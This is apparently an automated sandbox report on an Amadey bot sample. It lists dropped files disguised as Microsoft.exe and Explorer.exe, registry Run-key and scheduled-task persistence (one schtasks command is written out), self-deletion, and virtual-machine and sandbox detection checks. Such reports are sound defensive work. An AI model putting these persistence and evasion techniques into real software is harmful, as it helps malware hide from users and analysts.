Source: 40.2.Microsoft.exe.950000.0.unpack, C_o1_n0_m?.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'Dr6XwxffKZZohjSswrF', 'q6vvj1fxapGU34nOqe6', 'OIhC3ufsJ6QNyKFTaXM', 'mDXxGqfO4mVVr5a5LX3', 'GBbboqfCjTPeVRrmMvJ', 'QCbt2WfWPDxK8ZBExxK', 'HyKtC3f5wDCMbvSh56C'
Source: 40.2.Microsoft.exe.950000.0.unpack, Atomic.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'uEblgfst6AiKIqRMhwe', 'EB2O9usJQOTxrcSP95b', 'RG7e2fsjhLryBDQL5bY', 'pcpl04sFC1GZrCM5Xa8', 'mCeDyIsQ6rhMnBXdj4U'
Source: 40.2.Microsoft.exe.950000.0.unpack, FileZilla.cs	High entropy of concatenated method names: 'Scan', 'Mo0rbKc4d', 'SedlXRUwZ', '.ctor', 'KcHkuxoAnsJV1BDyW2', 'K0X50TvTRqxNx0MHbu', 'EnB1HrKRPH8nEZrXuB', 'LiMA8EBmsJRml1Q6q3', 'r45WRWYvRXUkBVXaHV', 'G5yHMirO5PlGy56TlC'
Source: 40.2.Microsoft.exe.950000.0.unpack, Chr_0_M_e.cs	High entropy of concatenated method names: 'Scan', 'CS6yHywri', 'eGRdsJqlr', 'Y7mIkwweV', 'greS9MNJq', 'uoTQwSB0i', 'MakeTries', 'ksxqqtWKH', 'rX7HvEym0ZNcGWQdlt', 'Tr7suLNuabTN9SEPxb'

Persistence and Installation Behavior:

Yara detected Amadey bot

Show sources

Source: Yara match	File source: 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.513466845.00000000024C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rnyuf.exe PID: 6176, type: MEMORYSTR

Drops PE files with benign system names

Show sources

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

File created: C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\uwtjrji

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File created: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4851.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\uwtjrji	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Microsoft[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File created: C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	File created: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Explorer[1].exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft.exe
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft.exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 25802
Source: unknown	Network traffic detected: HTTP traffic on port 25802 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 25802
Source: unknown	Network traffic detected: HTTP traffic on port 25802 -> 49820

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xutyomef1g.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\uwtjrji:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Show sources

Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\4851.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\4851.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 4448	Thread sleep time: -49800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4720	Thread sleep time: -43900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6808	Thread sleep time: -39400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep time: -36400s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6888	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe TID: 3260	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe TID: 6632	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe TID: 7132	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe TID: 6356	Thread sleep time: -4140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe TID: 6340	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe TID: 6340	Thread sleep time: -5940000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe TID: 4804	Thread sleep time: -480000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\4851.exe

22_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 180000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 616	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 498	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 439	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 455	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 394	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Window / User API: threadDelayed 1532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Window / User API: threadDelayed 5485	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Explorer[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\4851.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\4851.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 30000
